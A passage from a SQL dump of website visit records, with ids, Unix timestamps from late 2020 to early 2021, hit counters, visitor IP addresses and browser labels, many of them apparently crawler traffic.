,0,'91.196.178.2','chrome'),(548919,1608570698,1,1,0,0,'46.219.207.58','chrome'),(548920,1608570708,1,1,0,0,'31.13.127.13','other'),(548921,1608570818,1,1,0,0,'91.196.178.53','chrome'),(548922,1608570872,1,1,0,0,'173.206.157.190','firefox'),(548923,1608570943,1,1,0,0,'91.196.178.178','chrome'),(548924,1608570950,1,1,0,0,'185.237.217.2','chrome'),(548925,1608571078,1,1,0,0,'185.237.217.10','chrome'),(548926,1608571119,1,1,0,0,'46.211.1.68','chrome'),(548927,1608571129,1,1,0,0,'46.211.57.72','chrome'),(548928,1608571262,1,1,0,0,'91.196.178.57','chrome'),(548929,1608571322,1,1,0,0,'46.211.63.252','chrome'),(548930,1608571345,1,1,0,0,'91.196.178.69','chrome'),(548931,1608571477,1,1,0,0,'94.153.9.33','chrome'),(548932,1608571658,1,1,0,0,'91.196.178.168','chrome'),(548933,1608571835,1,1,0,0,'185.138.228.227','chrome'),(548934,1608571865,1,1,0,0,'31.13.127.15','other'),(548935,1608571866,1,1,0,0,'31.13.127.8','other'),(548936,1608571910,1,1,0,0,'185.237.217.0','chrome'),(548937,1608572055,1,1,0,0,'88.155.52.215','chrome'),(548938,1608572070,1,1,0,0,'91.196.178.70','chrome'),(548939,1608572285,1,1,0,0,'91.196.178.162','chrome'),(548940,1608572462,1,1,0,0,'95.133.152.199','chrome'),(548941,1608572480,1,1,0,0,'185.237.217.15','chrome'),(548942,1608572625,1,1,0,0,'174.219.7.155','other'),(548943,1608572895,1,1,0,0,'91.196.178.74','chrome'),(548944,1608573024,1,1,0,0,'37.52.22.24','chrome'),(548945,1608573072,1,1,0,0,'91.196.178.153','chrome'),(548946,1608573113,1,1,0,0,'31.13.127.120','other'),(548947,1608573121,1,1,0,0,'173.252.107.14','other'),(548948,1608573165,1,1,0,0,'128.124.33.65','chrome'),(548949,1608573225,1,1,0,0,'91.196.178.81','chrome'),(548950,1608573271,1,1,0,0,'91.196.178.129','chrome'),(548951,1608573289,1,1,0,0,'91.196.178.61','chrome'),(548952,1608573315,1,1,0,0,'94.153.60.87','chrome'),(548953,1608573360,1,1,0,0,'46.211.65.223','chrome'),(548954,1608573372,1,1,0,0,'91.196.178.168','other'),(548955,1608573637,1,1,0,0,'46.133.12.56','chrome'),(548956,1608573959,1,1,0,0,'91.196.178.186','chrome'),(548957,1608574019,1,1,0,0,'37.53.226.122','chrome'),(548958,1608574075,1,1,0,0,'46.211.40.20','chrome'),(548959,1608574125,1,1,0,0,'173.252.95.32','other'),(548960,1608574126,1,1,0,0,'69.171.251.34','other'),(548961,1608574554,1,1,0,0,'173.252.95.19','other'),(548962,1608574670,2,2,0,0,'185.237.217.11','chrome'),(548963,1608574745,1,1,0,0,'91.196.178.172','chrome'),(548964,1608575412,1,1,0,0,'173.252.95.24','other'),(548965,1608575834,1,1,0,0,'91.196.178.44','chrome'),(548966,1608576098,1,1,0,0,'92.112.230.179','chrome'),(548967,1608576108,1,1,0,0,'46.219.250.71','chrome'),(548968,1608576145,1,1,0,0,'185.30.202.106','chrome'),(548969,1608576172,1,1,0,0,'173.252.111.7','other'),(548970,1608576906,1,1,0,0,'91.196.178.163','chrome'),(548971,1608577087,1,1,0,0,'173.252.111.117','other'),(548972,1608577127,1,1,0,0,'173.252.127.118','other'),(548973,1608577933,1,1,0,0,'173.252.111.1','other'),(548974,1608577938,1,1,0,0,'173.252.127.28','other'),(548975,1608578294,1,1,0,0,'91.196.178.75','chrome'),(548976,1608578597,1,1,0,0,'185.237.217.11','chrome'),(548977,1608578665,1,1,0,0,'91.196.178.145','chrome'),(548978,1608578913,1,1,0,0,'37.73.29.16','chrome'),(548979,1608579154,1,1,0,0,'109.227.101.159','chrome'),(548980,1608579194,1,1,0,0,'173.252.111.118','other'),(548981,1608579278,1,1,0,0,'5.173.225.186','chrome'),(548982,1608579384,1,1,0,0,'91.196.178.29','chrome'),(548983,1608579516,1,1,0,0,'173.252.107.7','other'),(548984,1608580487,1,1,0,0,'91.196.178.39','chrome'),(548985,1608580692,1,1,0,0,'66.220.149.113','other'),(548986,1608580708,1,1,0,0,'173.252.127.33','other'),(548987,1608580730,1,1,0,0,'173.252.95.24','other'),(548988,1608580767,1,1,0,0,'81.111.116.96','chrome'),(548989,1608581253,1,1,0,0,'176.105.49.175','chrome'),(548990,1608581770,1,1,0,0,'31.13.127.14','other'),(548992,1608582446,1,1,0,0,'91.196.178.28','chrome'),(548993,1608582773,1,1,0,0,'91.196.178.145','chrome'),(548994,1608583217,1,1,0,0,'91.196.178.187','chrome'),(548995,1608583306,1,1,0,0,'173.252.111.112','other'),(548996,1608583323,1,1,0,0,'173.252.95.20','other'),(548997,1608583481,1,1,0,0,'80.78.70.9','other'),(548998,1608584185,1,1,0,0,'66.220.149.18','other'),(548999,1608584186,1,1,0,0,'69.171.251.5','other'),(549000,1608584231,1,1,0,0,'173.252.111.7','other'),(549001,1608584236,1,1,0,0,'173.252.95.12','other'),(549002,1608584266,2,2,0,0,'69.171.251.23','other'),(549004,1608584483,1,1,0,0,'151.34.39.138','chrome'),(549005,1608584877,1,1,0,0,'173.252.95.4','other'),(549006,1608584878,1,1,0,0,'173.252.95.23','other'),(549007,1608584884,1,1,0,0,'173.252.111.113','other'),(549008,1608585132,1,1,0,0,'185.212.251.250','chrome'),(549009,1608585221,1,1,0,0,'91.196.121.158','chrome'),(549010,1608585269,1,1,0,0,'178.209.136.141','chrome'),(549011,1608586159,1,1,0,0,'91.196.178.145','chrome'),(549012,1608589523,1,1,0,0,'195.114.148.137','chrome'),(549013,1608590667,1,1,0,0,'69.171.251.120','other'),(549014,1608590675,1,1,0,0,'173.252.95.30','other'),(549015,1608590893,1,1,0,0,'31.13.103.11','other'),(549016,1608592609,1,1,0,0,'213.111.81.63','chrome'),(549017,1608606697,1,1,0,0,'31.13.115.20','other'),(549018,1608608553,1,1,0,0,'66.220.149.113','other'),(549019,1608609618,1,1,0,0,'37.46.245.89','chrome'),(549020,1608610441,2,2,0,0,'193.194.124.94','firefox'),(549021,1608610763,1,1,0,0,'173.252.127.4','other'),(549022,1608611236,1,1,0,0,'31.13.103.2','other'),(549023,1608611237,1,1,0,0,'31.13.103.3','other'),(549024,1608611605,1,1,0,0,'185.237.217.11','chrome'),(549025,1608614382,1,1,0,0,'31.13.103.116','other'),(549026,1608614653,1,1,0,0,'91.196.178.47','chrome'),(549027,1608615635,1,1,0,0,'37.73.210.88','chrome'),(549028,1608615820,1,1,0,0,'31.13.103.12','other'),(549029,1608615821,1,1,0,0,'173.252.95.8','other'),(549030,1608616587,1,1,0,0,'94.100.220.53','chrome'),(549031,1608617268,1,1,0,0,'91.196.178.142','chrome'),(549032,1608617868,1,1,0,0,'185.237.217.11','chrome'),(549033,1608618232,1,1,0,0,'91.196.178.142','chrome'),(549034,1608620014,1,1,0,0,'88.155.75.99','chrome'),(549035,1608620624,1,1,0,0,'128.124.8.70','chrome'),(549036,1608621669,1,1,0,0,'91.196.178.81','chrome'),(549037,1608621712,2,2,0,0,'91.196.178.1','chrome'),(549038,1608621714,2,2,0,0,'91.196.177.66','chrome'),(549039,1608622539,1,1,0,0,'84.15.177.63','chrome'),(549040,1608624711,1,1,0,0,'46.211.78.64','chrome'),(549041,1608624979,1,1,0,0,'88.155.139.244','other'),(549042,1608625096,1,1,0,0,'91.196.178.90','chrome'),(549043,1608625134,1,1,0,0,'37.44.208.83','chrome'),(549044,1608625248,1,1,0,0,'173.252.95.9','other'),(549046,1608626045,1,1,0,0,'173.252.95.118','other'),(549048,1608626051,1,1,0,0,'37.55.58.58','chrome'),(549049,1608627927,1,1,0,0,'185.237.217.23','chrome'),(549050,1608628568,1,1,0,0,'91.196.177.53','chrome'),(549051,1608630383,1,1,0,0,'91.196.178.148','chrome'),(549052,1608630459,1,1,0,0,'91.196.178.184','chrome'),(549053,1608631463,1,1,0,0,'173.252.95.13','other'),(549055,1608631509,1,1,0,0,'37.73.136.13','chrome'),(549056,1608633027,1,1,0,0,'69.171.251.23','other'),(549057,1608633029,2,2,0,0,'69.171.251.2','other'),(549058,1608636552,1,1,0,0,'69.171.251.27','other'),(549059,1608638056,1,1,0,0,'91.196.178.164','chrome'),(549060,1608638564,1,1,0,0,'66.249.70.47','chrome'),(549061,1608639201,1,1,0,0,'91.196.178.9','chrome'),(549062,1608640549,1,0,1,0,'66.249.70.43',''),(549063,1608642634,1,1,0,0,'94.153.7.129','chrome'),(549064,1608643444,1,1,0,0,'66.220.149.29','other'),(549065,1608647082,1,1,0,0,'69.171.251.30','other'),(549066,1608647083,1,1,0,0,'66.220.149.20','other'),(549067,1608647476,1,1,0,0,'31.13.127.112','other'),(549068,1608647477,1,1,0,0,'31.13.127.18','other'),(549069,1608648881,1,1,0,0,'94.153.13.145','chrome'),(549070,1608652663,1,1,0,0,'91.196.178.38','chrome'),(549071,1608654803,1,1,0,0,'173.252.107.14','other'),(549072,1608655702,1,1,0,0,'91.196.177.73','other'),(549073,1608657676,1,1,0,0,'91.196.178.114','chrome'),(549074,1608658877,1,1,0,0,'193.178.187.17','other'),(549075,1608659276,1,1,0,0,'91.196.178.20','chrome'),(549076,1608660385,1,1,0,0,'128.124.212.148','chrome'),(549077,1608661534,1,0,1,0,'66.249.70.47',''),(549078,1608662572,1,1,0,0,'185.237.217.4','chrome'),(549079,1608669495,1,1,0,0,'173.252.83.118','other'),(549080,1608670959,1,1,0,0,'173.252.111.17','other'),(549081,1608670960,1,1,0,0,'173.252.95.19','other'),(549082,1608670980,1,1,0,0,'69.171.251.29','other'),(549083,1608671260,1,1,0,0,'91.196.121.134','chrome'),(549084,1608671935,1,1,0,0,'91.196.178.41','chrome'),(549085,1608673636,1,1,0,0,'89.64.87.253','other'),(549086,1608673670,1,1,0,0,'91.196.178.16','chrome'),(549087,1608695473,1,1,0,0,'178.133.81.155','chrome'),(549088,1608699553,1,1,0,0,'193.194.124.94','firefox'),(549089,1608704369,1,1,0,0,'66.249.70.43','chrome'),(549090,1608705751,1,1,0,0,'94.153.89.202','chrome'),(549091,1608717617,1,1,0,0,'31.13.127.9','other'),(549092,1608726901,1,0,1,0,'66.249.70.43',''),(549093,1608732056,1,1,0,0,'95.47.56.201','chrome'),(549094,1608734155,1,1,0,0,'172.58.231.46','chrome'),(549095,1608741786,1,1,0,0,'69.171.249.4','other'),(549096,1608743714,1,1,0,0,'31.13.127.12','other'),(549097,1608743716,1,1,0,0,'173.252.95.120','other'),(549098,1608743762,1,1,0,0,'173.252.95.25','other'),(549099,1608746019,1,1,0,0,'173.252.83.13','other'),(549100,1608748204,1,0,1,0,'66.249.70.45',''),(549101,1608754590,1,1,0,0,'185.237.217.11','chrome'),(549102,1608756054,1,1,0,0,'185.237.217.11','chrome'),(549103,1608760553,1,1,0,0,'31.13.127.21','other'),(549104,1608760554,1,1,0,0,'31.13.127.18','other'),(549106,1608760555,1,1,0,0,'31.13.127.23','other'),(549109,1608760556,1,1,0,0,'31.13.127.22','other'),(549110,1608761125,1,1,0,0,'92.112.231.73','chrome'),(549111,1608782071,1,1,0,0,'66.220.149.9','other'),(549112,1608782072,1,1,0,0,'69.171.251.118','other'),(549113,1608790825,1,1,0,0,'31.13.127.5','other'),(549114,1608790826,1,1,0,0,'31.13.103.14','other'),(549115,1608790827,1,1,0,0,'173.252.95.8','other'),(549116,1608790855,1,1,0,0,'95.134.202.13','chrome'),(549117,1608793895,1,1,0,0,'91.196.178.70','chrome'),(549118,1608794270,1,1,0,0,'91.196.178.93','chrome'),(549119,1608799838,1,1,0,0,'91.196.178.70','chrome'),(549120,1608801655,1,1,0,0,'173.252.127.13','other'),(549121,1608802828,1,1,0,0,'37.73.113.26','other'),(549122,1608803241,1,1,0,0,'31.13.127.18','other'),(549123,1608803242,1,1,0,0,'31.13.127.8','other'),(549124,1608808780,1,1,0,0,'74.125.151.47','other'),(549125,1608811329,1,1,0,0,'173.252.83.23','other'),(549126,1608813330,1,0,1,0,'66.249.70.43',''),(549127,1608813691,1,1,0,0,'91.196.178.26','chrome'),(549128,1608816110,1,1,0,0,'173.252.107.11','other'),(549129,1608817501,1,1,0,0,'66.249.70.45','chrome'),(549130,1608821335,1,0,1,0,'66.249.70.43',''),(549131,1608822841,1,1,0,0,'66.249.70.47','chrome'),(549132,1608847492,1,1,0,0,'173.252.79.1','other'),(549133,1608853727,1,1,0,0,'91.196.178.172','other'),(549134,1608859387,1,1,0,0,'31.13.103.112','other'),(549135,1608871518,1,1,0,0,'34.83.11.124','chrome'),(549136,1608871520,1,1,0,0,'35.247.47.212','chrome'),(549137,1608871522,1,1,0,0,'34.105.60.172','chrome'),(549138,1608871524,1,1,0,0,'34.82.236.205','chrome'),(549139,1608875483,1,1,0,0,'116.203.48.117','firefox'),(549140,1608884697,1,1,0,0,'185.237.217.11','chrome'),(549141,1608885821,1,1,0,0,'173.252.95.19','other'),(549142,1608890840,1,1,0,0,'31.13.127.120','other'),(549143,1608892391,1,1,0,0,'173.252.79.1','other'),(549144,1608895000,1,1,0,0,'91.196.178.119','chrome'),(549145,1608898327,1,1,0,0,'91.124.210.141','firefox'),(549146,1608898908,1,1,0,0,'173.252.83.10','other'),(549147,1608901805,1,0,1,0,'66.249.70.47',''),(549148,1608909660,1,1,0,0,'138.246.253.24','chrome'),(549149,1608913210,1,1,0,0,'66.249.70.45','chrome'),(549150,1608914040,1,0,1,0,'66.249.70.43',''),(549151,1608915552,1,1,0,0,'173.252.95.8','other'),(549152,1608921473,1,1,0,0,'66.249.70.43','chrome'),(549153,1608924362,1,1,0,0,'173.252.95.28','other'),(549154,1608927691,1,1,0,0,'173.252.111.14','other'),(549155,1608929241,1,0,1,0,'66.249.70.47',''),(549156,1608932304,1,1,0,0,'52.43.127.11','chrome'),(549157,1608941593,1,1,0,0,'91.196.178.189','chrome'),(549158,1608967015,1,1,0,0,'66.249.70.43','chrome'),(549159,1608973028,1,1,0,0,'173.252.111.9','other'),(549160,1608973029,1,1,0,0,'173.252.111.10','other'),(549163,1608973386,1,1,0,0,'66.249.70.43','chrome'),(549164,1608980081,1,0,1,0,'66.249.70.43',''),(549165,1608989519,1,0,1,0,'66.249.70.45',''),(549166,1608999158,1,1,0,0,'185.237.217.11','chrome'),(549167,1609005210,1,1,0,0,'173.252.83.24','other'),(549168,1609007565,1,1,0,0,'185.237.217.11','chrome'),(549169,1609012731,1,1,0,0,'173.252.111.13','other'),(549170,1609012744,1,1,0,0,'173.252.95.19','other'),(549171,1609020114,1,1,0,0,'31.13.127.23','other'),(549172,1609020218,1,1,0,0,'31.13.127.116','other'),(549173,1609020666,1,1,0,0,'31.13.127.22','other'),(549174,1609020667,1,1,0,0,'31.13.127.118','other'),(549175,1609046537,1,0,1,0,'66.249.70.47',''),(549176,1609053881,1,1,0,0,'173.252.95.21','other'),(549177,1609066142,1,1,0,0,'138.246.253.24','chrome'),(549178,1609075231,1,1,0,0,'66.249.70.45','chrome'),(549179,1609076006,1,0,1,0,'66.249.70.43',''),(549180,1609097640,1,1,0,0,'173.252.107.13','other'),(549181,1609099231,1,1,0,0,'173.252.127.4','other'),(549182,1609099237,1,1,0,0,'173.252.127.14','other'),(549183,1609099258,1,1,0,0,'173.252.95.4','other'),(549184,1609099266,1,1,0,0,'173.252.127.31','other'),(549185,1609099267,1,1,0,0,'173.252.127.8','other'),(549186,1609099286,1,1,0,0,'173.252.127.113','other'),(549187,1609099318,1,1,0,0,'173.252.111.22','other'),(549188,1609099346,1,1,0,0,'173.252.127.120','other'),(549189,1609099385,1,1,0,0,'173.252.127.6','other'),(549190,1609099387,1,1,0,0,'69.171.251.1','other'),(549191,1609099417,1,1,0,0,'173.252.127.117','other'),(549192,1609099418,1,1,0,0,'173.252.127.26','other'),(549194,1609099438,1,1,0,0,'173.252.127.7','other'),(549195,1609099439,1,1,0,0,'173.252.127.112','other'),(549196,1609099440,1,1,0,0,'173.252.127.23','other'),(549197,1609099514,1,1,0,0,'173.252.127.11','other'),(549198,1609102105,1,1,0,0,'173.252.95.18','other'),(549199,1609105679,1,1,0,0,'31.13.127.22','other'),(549200,1609114361,1,1,0,0,'66.249.70.47','chrome'),(549201,1609121640,1,1,0,0,'66.249.70.43','chrome'),(549202,1609126106,2,2,0,0,'5.255.253.92','other'),(549203,1609132835,1,0,1,0,'66.249.70.47',''),(549204,1609134283,1,0,1,0,'66.249.70.47',''),(549205,1609141057,1,1,0,0,'66.249.70.43','chrome'),(549206,1609152914,1,1,0,0,'173.252.83.116','other'),(549207,1609155079,1,1,0,0,'185.237.217.11','chrome'),(549208,1609163545,1,0,1,0,'66.249.70.45',''),(549209,1609164797,1,1,0,0,'31.13.103.16','other'),(549210,1609164798,1,1,0,0,'173.252.95.13','other'),(549211,1609200985,1,1,0,0,'66.249.70.47','chrome'),(549212,1609215775,1,0,1,0,'66.249.70.45',''),(549213,1609229601,1,1,0,0,'173.252.83.8','other'),(549214,1609247167,1,1,0,0,'91.196.178.70','chrome'),(549215,1609248273,1,1,0,0,'91.196.178.70','chrome'),(549216,1609249914,1,0,1,0,'66.249.70.43',''),(549217,1609258892,1,1,0,0,'31.13.103.6','other'),(549218,1609264719,1,1,0,0,'173.252.83.118','other'),(549219,1609270048,1,1,0,0,'66.249.70.45','chrome'),(549220,1609286384,1,1,0,0,'157.245.91.33','firefox'),(549221,1609289834,1,1,0,0,'109.70.106.130','other'),(549222,1609296658,1,1,0,0,'64.246.165.170','firefox'),(549223,1609303910,1,0,1,0,'66.249.70.47',''),(549224,1609310120,1,1,0,0,'66.249.70.45','chrome'),(549225,1609312261,1,0,1,0,'66.249.70.45',''),(549226,1609336734,1,0,1,0,'66.249.70.43',''),(549227,1609342635,1,1,0,0,'173.252.83.2','other'),(549228,1609348793,1,1,0,0,'209.17.96.130','other'),(549229,1609370169,1,0,1,0,'66.249.70.45',''),(549230,1609371133,1,0,1,0,'66.249.70.45',''),(549231,1609371539,1,1,0,0,'66.249.70.47','chrome'),(549232,1609371666,3,0,3,0,'66.249.70.43',''),(549233,1609373216,1,0,1,0,'66.249.70.43',''),(549234,1609376637,2,0,2,0,'66.249.70.45',''),(549235,1609389538,1,0,1,0,'66.249.70.45',''),(549236,1609401125,1,0,1,0,'66.249.70.47',''),(549237,1609416348,1,1,0,0,'159.89.2.220','firefox'),(549238,1609418487,1,1,0,0,'185.237.217.11','chrome'),(549239,1609423053,1,0,1,0,'66.249.70.43',''),(549240,1609432140,1,1,0,0,'66.249.70.43','chrome'),(549241,1609434855,1,1,0,0,'66.249.70.47','chrome'),(549242,1609435095,1,1,0,0,'66.249.70.43','chrome'),(549243,1609435188,1,1,0,0,'195.10.210.70','chrome'),(549244,1609438005,1,1,0,0,'66.249.70.45','chrome'),(549245,1609441677,1,0,1,0,'66.249.70.43',''),(549246,1609444512,1,1,0,0,'66.249.70.47','chrome'),(549247,1609459954,1,1,0,0,'173.252.83.23','other'),(549248,1609471324,1,0,1,0,'66.249.70.47',''),(549249,1609477053,1,0,1,0,'66.249.70.47',''),(549250,1609485693,1,1,0,0,'209.17.96.210','other'),(549251,1609487723,1,1,0,0,'173.252.95.6','other'),(549252,1609487727,1,1,0,0,'31.13.127.2','other'),(549253,1609487729,1,1,0,0,'66.220.149.17','other'),(549254,1609487779,1,1,0,0,'31.13.127.13','other'),(549255,1609488114,2,2,0,0,'66.249.70.45','chrome'),(549256,1609488385,1,1,0,0,'31.13.103.2','other'),(549257,1609516030,1,1,0,0,'66.249.70.45','chrome'),(549258,1609517876,1,1,0,0,'173.252.83.8','other'),(549259,1609537229,1,1,0,0,'185.237.217.7','firefox'),(549260,1609547975,1,1,0,0,'138.246.253.24','chrome'),(549261,1609557770,1,0,1,0,'66.249.70.45',''),(549262,1609565642,1,1,0,0,'66.249.70.43','chrome'),(549263,1609570832,1,1,0,0,'66.249.70.47','chrome'),(549264,1609572669,1,1,0,0,'66.249.70.45','chrome'),(549265,1609591980,1,1,0,0,'94.153.52.139','other'),(549266,1609596589,1,1,0,0,'91.241.123.19','chrome'),(549267,1609601572,1,1,0,0,'185.237.217.11','chrome'),(549268,1609602048,3,3,0,0,'31.13.127.2','other'),(549269,1609602049,1,1,0,0,'31.13.127.18','other'),(549270,1609602102,1,1,0,0,'31.13.127.119','other'),(549271,1609602105,1,1,0,0,'66.220.149.17','other'),(549272,1609602141,2,2,0,0,'31.13.127.118','other'),(549274,1609602142,2,2,0,0,'31.13.127.12','other'),(549275,1609602147,1,1,0,0,'69.171.251.4','other'),(549276,1609602176,1,1,0,0,'173.252.95.22','other'),(549277,1609602195,2,2,0,0,'173.252.127.111','other'),(549279,1609602215,1,1,0,0,'173.252.127.15','other'),(549280,1609602217,1,1,0,0,'69.171.251.119','other'),(549281,1609602237,1,1,0,0,'69.171.251.24','other'),(549282,1609602244,1,1,0,0,'173.252.95.23','other'),(549283,1609602273,1,1,0,0,'66.220.149.26','other'),(549284,1609602282,1,1,0,0,'173.252.127.5','other'),(549285,1609602308,1,1,0,0,'31.13.127.20','other'),(549286,1609602399,1,1,0,0,'31.13.127.10','other'),(549287,1609602417,2,2,0,0,'31.13.127.117','other'),(549288,1609602418,1,1,0,0,'173.252.95.16','other'),(549289,1609602423,2,2,0,0,'69.171.251.10','other'),(549290,1609602459,2,2,0,0,'69.171.251.18','other'),(549291,1609602464,1,1,0,0,'173.252.95.3','other'),(549292,1609602469,1,1,0,0,'94.153.34.161','chrome'),(549293,1609602499,1,1,0,0,'69.171.251.7','other'),(549294,1609602502,1,1,0,0,'31.13.103.112','other'),(549295,1609602513,1,1,0,0,'91.196.178.188','chrome'),(549296,1609602515,1,1,0,0,'66.220.149.27','other'),(549297,1609602526,1,1,0,0,'69.171.251.14','other'),(549298,1609602533,2,2,0,0,'173.252.95.10','other'),(549299,1609602563,2,2,0,0,'69.171.251.19','other'),(549300,1609602567,1,1,0,0,'31.13.127.1','other'),(549301,1609602589,1,1,0,0,'69.171.251.21','other'),(549302,1609602605,1,1,0,0,'91.214.17.10','chrome'),(549303,1609602608,1,1,0,0,'31.13.103.20','other'),(549304,1609602640,1,1,0,0,'31.13.115.7','other'),(549305,1609602645,2,2,0,0,'173.252.95.7','other'),(549306,1609602667,1,1,0,0,'66.220.149.30','other'),(549307,1609602688,1,1,0,0,'173.252.95.17','other'),(549308,1609602695,1,1,0,0,'173.252.95.116','other'),(549309,1609602721,1,1,0,0,'93.171.170.250','other'),(549310,1609602726,1,1,0,0,'173.252.127.27','other'),(549311,1609602756,1,1,0,0,'173.252.95.2','other'),(549312,1609602766,1,1,0,0,'69.171.251.22','other'),(549313,1609602774,1,1,0,0,'66.220.149.18','other'),(549314,1609602811,2,2,0,0,'173.252.127.29','other'),(549315,1609602887,1,1,0,0,'69.171.251.15','other'),(549316,1609602890,2,2,0,0,'69.171.251.27','other'),(549317,1609602904,3,3,0,0,'31.13.127.112','other'),(549319,1609602905,1,1,0,0,'31.13.127.15','other'),(549321,1609602932,1,1,0,0,'69.171.251.26','other'),(549322,1609603000,1,1,0,0,'31.13.115.21','other'),(549323,1609603018,1,1,0,0,'173.252.95.13','other'),(549324,1609603052,1,1,0,0,'173.252.95.24','other'),(549325,1609603124,1,1,0,0,'66.220.149.7','other'),(549326,1609603198,2,2,0,0,'69.171.251.11','other'),(549327,1609603287,1,1,0,0,'173.252.127.6','other'),(549328,1609603293,1,1,0,0,'69.171.251.16','other'),(549329,1609603333,1,1,0,0,'46.211.11.216','chrome'),(549330,1609603377,1,1,0,0,'173.252.95.19','other'),(549331,1609603404,2,2,0,0,'173.252.95.119','other'),(549332,1609603468,1,1,0,0,'31.13.115.24','other'),(549333,1609603485,1,1,0,0,'69.171.251.23','other'),(549334,1609603486,1,1,0,0,'173.252.127.28','other'),(549335,1609603503,1,1,0,0,'31.13.127.18','other'),(549336,1609603534,1,1,0,0,'173.252.127.14','other'),(549337,1609603559,1,1,0,0,'31.13.103.11','other'),(549338,1609603575,1,1,0,0,'173.252.127.3','other'),(549339,1609603579,2,2,0,0,'69.171.251.28','other'),(549340,1609603633,1,1,0,0,'31.13.103.118','other'),(549341,1609603654,1,1,0,0,'69.171.251.17','other'),(549342,1609603759,2,2,0,0,'31.13.103.22','other'),(549343,1609603762,1,1,0,0,'66.220.149.37','other'),(549344,1609603764,1,1,0,0,'66.220.149.1','other'),(549345,1609603778,1,1,0,0,'173.252.95.111','other'),(549346,1609603823,1,1,0,0,'66.220.149.33','other'),(549347,1609603830,2,2,0,0,'66.220.149.25','other'),(549348,1609603872,1,1,0,0,'173.252.127.17','other'),(549349,1609603927,1,1,0,0,'69.171.251.1','other'),(549350,1609603930,1,1,0,0,'66.220.149.32','other'),(549351,1609603970,1,1,0,0,'31.13.103.2','other'),(549352,1609603972,1,1,0,0,'69.171.251.22','other'),(549354,1609603975,1,1,0,0,'66.220.149.15','other'),(549355,1609604094,2,2,0,0,'69.171.251.20','other'),(549356,1609604100,3,3,0,0,'173.252.95.2','other'),(549357,1609604177,2,2,0,0,'69.171.251.119','other'),(549358,1609604293,1,1,0,0,'69.171.251.4','other'),(549359,1609604300,1,1,0,0,'173.252.127.22','other'),(549360,1609604301,1,1,0,0,'31.43.227.159','chrome'),(549361,1609604410,1,1,0,0,'31.13.103.14','other'),(549362,1609604508,1,1,0,0,'69.171.251.9','other'),(549363,1609604514,2,2,0,0,'173.252.95.6','other'),(549364,1609604524,1,1,0,0,'173.252.127.27','other'),(549365,1609604606,1,1,0,0,'66.220.149.3','other'),(549366,1609604610,1,1,0,0,'31.13.115.18','other'),(549367,1609604615,1,1,0,0,'173.252.127.9','other'),(549368,1609604772,1,1,0,0,'69.171.251.23','other'),(549369,1609604799,1,1,0,0,'31.13.127.6','other'),(549370,1609604841,1,1,0,0,'31.13.115.10','other'),(549371,1609604855,2,2,0,0,'31.13.127.12','other'),(549372,1609604856,1,1,0,0,'31.13.127.9','other'),(549373,1609604941,1,1,0,0,'66.220.149.14','other'),(549374,1609605015,1,1,0,0,'173.252.95.15','other'),(549375,1609605038,1,1,0,0,'31.13.127.1','other'),(549376,1609605043,1,1,0,0,'69.171.251.19','other'),(549377,1609605115,1,1,0,0,'69.171.251.13','other'),(549378,1609605198,1,1,0,0,'69.171.251.10','other'),(549379,1609605354,1,1,0,0,'173.252.127.31','other'),(549380,1609605401,1,1,0,0,'173.252.95.12','other'),(549381,1609605530,1,1,0,0,'69.171.251.118','other'),(549382,1609605572,1,1,0,0,'31.13.115.113','other'),(549383,1609605602,1,1,0,0,'69.171.251.8','other'),(549384,1609605624,1,1,0,0,'173.252.95.9','other'),(549385,1609605632,1,1,0,0,'31.13.127.4','other'),(549386,1609605639,1,1,0,0,'66.220.149.118','other'),(549387,1609605683,1,1,0,0,'173.252.127.1','other'),(549388,1609605690,1,1,0,0,'31.13.103.20','other'),(549389,1609605744,2,2,0,0,'69.171.251.18','other'),(549390,1609605868,1,1,0,0,'69.171.251.116','other'),(549391,1609605876,1,1,0,0,'5.58.190.137','chrome'),(549392,1609605899,1,1,0,0,'66.220.149.119','other'),(549393,1609605954,1,1,0,0,'173.252.95.112','other'),(549394,1609605958,1,1,0,0,'173.252.127.17','other'),(549395,1609605984,1,1,0,0,'66.220.149.21','other'),(549396,1609605998,1,1,0,0,'69.171.251.17','other'),(549397,1609606074,1,1,0,0,'66.220.149.16','other'),(549398,1609606202,1,1,0,0,'69.171.251.117','other'),(549399,1609606219,1,1,0,0,'173.252.127.7','other'),(549400,1609606349,2,2,0,0,'173.252.95.6','other'),(549401,1609606362,1,1,0,0,'31.13.103.2','other'),(549402,1609606415,1,1,0,0,'31.13.115.117','other'),(549403,1609606488,1,1,0,0,'31.13.127.112','other'),(549404,1609606541,1,1,0,0,'173.252.95.7','other'),(549405,1609606553,1,1,0,0,'69.171.251.111','other'),(549406,1609606578,1,1,0,0,'95.135.31.152','chrome'),(549407,1609606597,1,1,0,0,'31.13.103.20','other'),(549408,1609606608,1,1,0,0,'173.252.127.30','other'),(549409,1609606622,1,1,0,0,'173.252.95.120','other'),(549411,1609606625,1,1,0,0,'31.13.127.8','other'),(549412,1609606631,1,1,0,0,'31.13.103.120','other'),(549413,1609606662,1,1,0,0,'69.171.251.16','other'),(549414,1609606678,1,1,0,0,'176.121.6.71','chrome'),(549415,1609606747,1,1,0,0,'173.252.95.19','other'),(549416,1609606791,1,1,0,0,'69.171.251.113','other'),(549417,1609606818,1,1,0,0,'31.13.103.119','other'),(549418,1609606887,1,1,0,0,'69.171.251.4','other'),(549419,1609606893,1,1,0,0,'31.13.127.9','other'),(549420,1609606939,1,1,0,0,'173.252.127.111','other'),(549421,1609606990,1,1,0,0,'66.220.149.14','other'),(549422,1609607047,2,2,0,0,'173.252.95.21','other'),(549423,1609607097,1,1,0,0,'173.252.127.28','other'),(549424,1609607134,1,1,0,0,'31.13.127.1','other'),(549425,1609607147,2,2,0,0,'31.13.115.22','other'),(549426,1609607214,1,1,0,0,'69.171.251.27','other'),(549427,1609607233,1,1,0,0,'173.252.127.27','other'),(549428,1609607309,1,1,0,0,'31.13.115.11','other'),(549429,1609607331,1,1,0,0,'69.171.251.14','other'),(549430,1609607346,2,2,0,0,'69.171.251.119','other'),(549431,1609607365,1,1,0,0,'173.252.127.13','other'),(549432,1609607587,1,1,0,0,'66.220.149.118','other'),(549433,1609607689,1,1,0,0,'173.252.95.5','other'),(549434,1609607917,1,1,0,0,'173.252.95.117','other'),(549435,1609607918,1,1,0,0,'31.13.127.14','other'),(549436,1609607929,1,1,0,0,'66.220.149.10','other'),(549437,1609607976,1,1,0,0,'69.171.251.2','other'),(549438,1609607980,1,1,0,0,'173.252.95.111','other'),(549439,1609607991,1,1,0,0,'69.171.251.116','other'),(549440,1609608059,2,2,0,0,'66.220.149.24','other'),(549441,1609608099,1,1,0,0,'69.171.251.4','other'),(549442,